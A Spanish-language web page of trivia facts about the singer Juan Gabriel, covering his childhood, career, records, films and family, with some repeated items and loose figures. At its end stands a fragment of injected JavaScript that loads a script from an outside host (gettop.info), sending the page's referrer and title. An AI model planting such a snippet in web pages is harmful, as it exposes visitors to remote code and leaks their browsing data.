Para Saber Más

Juan Gabriel

En la década de los 70 decidió tomar como nombre artístico Juan Gabriel en honor a su maestro Juan Contreras y su padre Gabriel.

Su Calle

La calle donde nació, 5 de mayo, ahora se llama “Juan Gabriel”. Fue parte de un homenaje realizado en 2003 por el gobierno de Parácuaro.

Juan Gabriel

Su primera actuación profesional, ya con el nombre de Juan Gabriel, fue a finales de 1971 en Venezuela.

 El Número

Su número cabalístico es el 7, siempre ha estado ligado a su vida, inclusive, casi todos sus discos llevan en sus claves esa terminación.

El más cantado

Es probablemente el compositor hispano más cantado a nivel mundial, sus canciones han sido traducidas desde el inglés hasta el ruso o turco.

Control

Es el único compositor en el mundo que tiene control total de su obra, logro que obtuvo tras una larga batalla legal con su ex disquera, BMG.

La Oportunidad

Su primera oportunidad fue en el programa de tv local “Noches rancheras”, conducido por Raúl Loya, quien lo bautizó con el nombre artístico de Adán Luna.

Lo que fue

Durante un tiempo fue ayudante en un templo metodista, en donde se encargaba de la limpieza, además de cantar en el coro y de hacer lecturas de La Biblia.

La Pareja Musical

Con Rocío Dúrcal formó la pareja musical más recordada y aplaudida en toda la historia musical del mundo latino; juntos consiguieron ventas por más de 30 millones de discos.

El Máximo Generador de ingresos

Es el máximo generador de ingresos por regalías de la Sociedad de Autores y Compositores de México (SACM).

Dolencias

De niño padeció de afecciones bronquiales y ciática. La mayor parte de su infancia la pasó en Ciudad Juárez, Chihuahua.

Camino a el logro

La primera vez que vino a la capital tuvo que quedarse a dormir en la Alameda Central y la Basílica de Guadalupe, por falta de dinero.

Alberto

Sus padres lo bautizado como “Alberto“, en honor al personaje de una historia cubana, “El derecho de nacer”, llamado Albertico Limonta, de moda gracias a una radionovela de la XEW.

Su Voz

Se dice que cada 40 segundos, por radio o televisión, en su voz o la de sus intérpretes, se escucha una canción de él.

La Guitarra

Un compañero del internado le alquilaba su guitarra por 20 centavos diarios para que pudiera interpretar sus composiciones.

Las Llaves

Su fama a nivel internacional le ha merecido recibir las Llaves de la Ciudad en el Vaticano, Madrid, Asunción, Bolivia, Perú y Argentina.

Su departamento

Con sus primeros ahorros compró un departamento en Tlatelolco; posteriormente, en 1973 adquirió dos casas para su madre.

Sus Canciones

Es el compositor mexicano con mayor número de canciones registradas.

Cumbre de las Américas

Fue elegido para cantar ante los presidentes de América Latina en la Cumbre de las Américas que fue realizada en el año de 1992, en Guadalajara.

Trayectoria

Cuenta con más de mil 1800 canciones, algunas interpretadas por más de 300 cantantes nacionales e internacionales.

Su Padre

La canción “De sol a sol” está inspirada en la muerte de su padre, que era una persona que se dedicaba a labrar la tierra.

Cine

Realizó también 5 películas entre 1974 y 1981: “El Noa-Noa”, “Es mi vida”, “Del otro lado del puente”, “Nobleza ranchera y “En esta primavera”.

Coros

En sus inicios realizó coros para artistas del momento como Angélica María, Roberto Jordán y Estela Núñez, quienes luego cantarían sus temas.

La Escuela

En 1987 creó la Escuela de Música y Albergue Infantil Semjase, dedicado a albergar a los niños de escasos recursos económicos.

La Casona

Compró la vieja casona de Ciudad Juárez, en donde su madre trabajó como empleada doméstica.

Récords

Pese a ocho años sin grabar un disco (1987-1995), el divo consiguió romper récords de entradas con “Sold out” en EU, México y Latinoamérica.

Más Vivo que Nunca

En agosto de 1978 corrió la noticia de que intentó quitarse la vida, para aclarar el rumor publicó una carta abierta y lo desmintió.

Sus días

Juan Gabriel tiene dos días dedicados en su honor: el 17 de diciembre (desde 2009) en las Vegas y el 5 de octubre en Los Ángeles (desde1986).

Aire Puro

El compositor e intérprete difícilmente acepta que alguien fume en su casa o en los estudios de grabación donde esté trabajando.

Abuelo

Su hijo Iván Gabriel lo hizo abuelo en octubre de 2014.

La Criada Bien Criada

A finales de los 70 participó en el programa de televisión la criada bien criada protagonizado por María Victoria.

El Compositor

Es el compositor que más canciones ha escrito para otros artistas como María Victoria, Daniela Romo, Lucía Méndez, Lola Beltrán o Lucha Villa.

Persona del Año

Se convirtió en el décimo artista en recibir el premio a la Persona del año de la Academia Latina de la Grabación.

Querida

Su tema “Querida” se coloca más de un año en el primer lugar de popularidad en México y Sudamérica (1984).

Hijos

Nunca se ha casado pero tiene cuatro hijos con su mejor amiga Laura Salas: Iván, Joan, Jean y Hans.

El Divo

Dado el éxito que logró en México, Estados Unidos, Latinoamérica y Europa, es conocido también como “El Divo de Juárez”.

La Primera

Queta Jiménez, La Prieta Linda, es la primera artista que le graba un tema; se trata de la canción Noche a Noche, tema que formó parte de su producción discográfica, Cosas de Enamorados año 1982

El Menor

Hijo de los campesinos Gabriel Aguilera Rodríguez y Vitoria Valadez Rojas. Fue el menor de 10 hermanos.

En busca del sueño

En México varias compañías discográficas lo rechazaron y vuelve a ciudad Juárez trabajo en el centro nocturno Malibú, en el que conoció a su protectora, la señora McCulley, quien lo convenció volver a México.

Canciones para Telenovelas

Autor e intérprete: Inocente de ti (2004/05), Inocente de ti. Mariana de la noche (2003/04), Yo te recuerdo. Abrázame muy fuerte (2000/01), Abrázame muy fuerte. María Emilia, querida (1999/2000), Querida. Leonela, muriendo de amor (1997/1998), Muriendo de amor. Te sigo amando (1996/97), Te sigo amando

Autor: El extraño retorno de Diana Salazar (1988), Un alma en pena (interpretada por Lucía Méndez). El camino secreto (1986), De mí enamórate (interpretada por Daniela Romo). (Volver a empezar) (1994), Querida (interpreta Chayanne)

Tapas de Notitas

Juan Gabriel hasta el 15 de noviembre 1990 llego a ser el artista con más tapas/portadas de Notitas Musicales con el número 36 pero en la historia de la revista Juan Gabriel ocupa el puesto número 1 con un total de 40 portadas.

Boletos

Juan Gabriel es el artista latinoamericano que más boletos ha vendido en sus presentaciones en los Estados Unidos.

Lo que un artista sueña

En estas tres décadas y media de componer y cantar, Juan Gabriel ha tenido la dicha de que sus temas hayan sido interpretados por más de 700 cantantes de diversas nacionalidades. Pero lo más impresionante es que ha vendido 30 millones de discos y ha actuado en los más grandes escenarios del mundo.

A mis 16

A la edad de 16 años debutó en el cabaret “Noa Noa” interpretando las canciones Adoro, Cenizas, Yo te amo, Yo sé que no es feliz y Harlem español, entre otras, acompañado por el grupo “Los prisioneros del ritmo”. Precisamente, inspirado en esta época, compone después la canción que llevaría el nombre del centro nocturno que lo ve nacer: El Noa Noa.

Productor

Ha dirigido producciones para Rocío Dúrcal, Lucha Villa, Lola Beltrán y Paul Anka, entre otros artistas, un ranking de leyendas que lo convierten a él mismo, como se ha señalado, en otra gran leyenda.

Sueño Cumplido

Su primera grabación se realiza el 4 de agosto de 1971

Prueba Artística 

La primera prueba artista, realizada por el maestro Eduardo Magallanes, es con el tema Escándalo, de Rubén Fuentes.

Coros

Antes de ser Juan Gabriel realizó coros para artistas como Angélica María, Roberto Jordán y Estela Núñez.

Travesuras

Dejo encerrada con llave a su mamá, para que no saliera a buscarlo.

Diversión

Sus diversiones favoritas cuando era niño era andar en bicicletas y jugar a las “escondidas”.

Dormir sin techo

Cuando llego a D.F. se vio con la necesidad de dormir en las estaciones de ferrocarriles, en las terminales de autobuses, en la Alameda Central y en la Villa de Guadalupe.

Dinero

Lucha Villa le prestó dinero para comer cuando más lo necesitaba.

RCA

Antes de ser aceptado en RCA, lo habían rechazado en CBS, Musart y Peerless.

Pan Dulce

En el internado, aprendió a hacer pan dulce y donas de chocolate.

De niño

Su alimento favorito de niño: nata con pan y canela.

Primer Sueldo

Su primer sueldo fue de niño por haber cantado y recibió 5 dólares.

Oficios de Niño

Hojalatero, panadero, lavacoches, enfermero y mesero.

Su anhelo

Vivir en un rancho, lejos de la ciudad, cuidando cosechas y animales.

Su anhelo

Vivir en un rancho, lejos de la ciudad, cuidando. Le gustan todos los animales domésticos, principalmente vacas y gallinas.

Miradas

Le impresionan mucho las miradas de los perros.

Autobiográficas

Sus dos películas autobiográficas son “El Noa Noa” y “Esta es mi Vida”

Bilingüe

Su primera y única grabación bilingüe (inglés y español) “Con tu amor” (With your love) fue en el año 1981.

Hoteles

No le gusta quedarse en hoteles, prefiere hospedarse en casas particulares.

El menor

Fue el menor de 10 hermanos

Géneros

Interpretó géneros como el pop y la balada moderna, en los cuales consiguió ventas millonarias con temas como: Pero qué necesidad (1994), Lentamente (1994), Así fue (1998), Todo está bien (1999), Abrázame muy fuerte (2000), Inocente pobre amigo (2001) e Inocente de ti (2003).

Contrato

En el 2008 firma un contrato multimillonario con la discográfica Universal Music por espacio de diez años

5 años

A la edad de 5 años ya cantaba y se desenvolvía como todo un profesional.

Mayoría de edad

Aún sin cumplir la mayoría de edad era autor de más de 300 composiciones.

8 años

Juan Gabriel vivió de niño 8 años en un internado de Ciudad Juárez en donde aprendió artesanías y hojalatería en donde gano sus primeros pesos vendiendo mesas, canastas y sillas que el mismo fabricaba.

Primer nombre artístico

Su primer nombre artístico fue Adán Luna.

La mejor voz

Sin un peso en el bolsillo recorrió todo el país en busca de fortuna y llegó a la Ciudad de México la cual le pareció demasiado grande, por lo que, partió rumbo a Tijuana en donde cantaba en el coro de la catedral siendo considerado una de las mejores voces

 

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; }

shares